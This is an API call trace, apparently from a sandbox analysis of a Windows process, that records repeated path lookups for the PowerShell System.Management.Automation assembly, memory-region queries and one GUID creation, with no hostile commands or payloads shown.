	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.487] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] VirtualQuery (in: lpAddress=0x28c050, lpBuffer=0x28cf10, dwLength=0x30 | out: lpBuffer=0x28cf10*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.488] VirtualQuery (in: lpAddress=0x28c050, lpBuffer=0x28cf10, dwLength=0x30 | out: lpBuffer=0x28cf10*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.489] VirtualQuery (in: lpAddress=0x28b740, lpBuffer=0x28c600, dwLength=0x30 | out: lpBuffer=0x28c600*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.489] VirtualQuery (in: lpAddress=0x28b7d0, lpBuffer=0x28c690, dwLength=0x30 | out: lpBuffer=0x28c690*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.489] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.489] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.962] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.962] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.963] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.963] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.964] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.965] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.965] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.966] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.966] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] VirtualQuery (in: lpAddress=0x28bb80, lpBuffer=0x28ca40, dwLength=0x30 | out: lpBuffer=0x28ca40*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] VirtualQuery (in: lpAddress=0x28beb0, lpBuffer=0x28cd70, dwLength=0x30 | out: lpBuffer=0x28cd70*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] VirtualQuery (in: lpAddress=0x28bf40, lpBuffer=0x28ce00, dwLength=0x30 | out: lpBuffer=0x28ce00*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0401.967] CoCreateGuid (in: pguid=0x28d730 | out: pguid=0x28d730*(Data1=0x7ac654bf, Data2=0x19d3, Data3=0x4654, Data4=([0]=0xaa, [1]=0x98, [2]=0xef, [3]=0x62, [4]=0xa3, [5]=0xed, [6]=0xc5, [7]=0x5f))) returned 0x0
	[0401.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.971] VirtualQuery (in: lpAddress=0x28b740, lpBuffer=0x28c600, dwLength=0x30 | out: lpBuffer=0x28c600*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.971] VirtualQuery (in: lpAddress=0x28b7d0, lpBuffer=0x28c690, dwLength=0x30 | out: lpBuffer=0x28c690*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
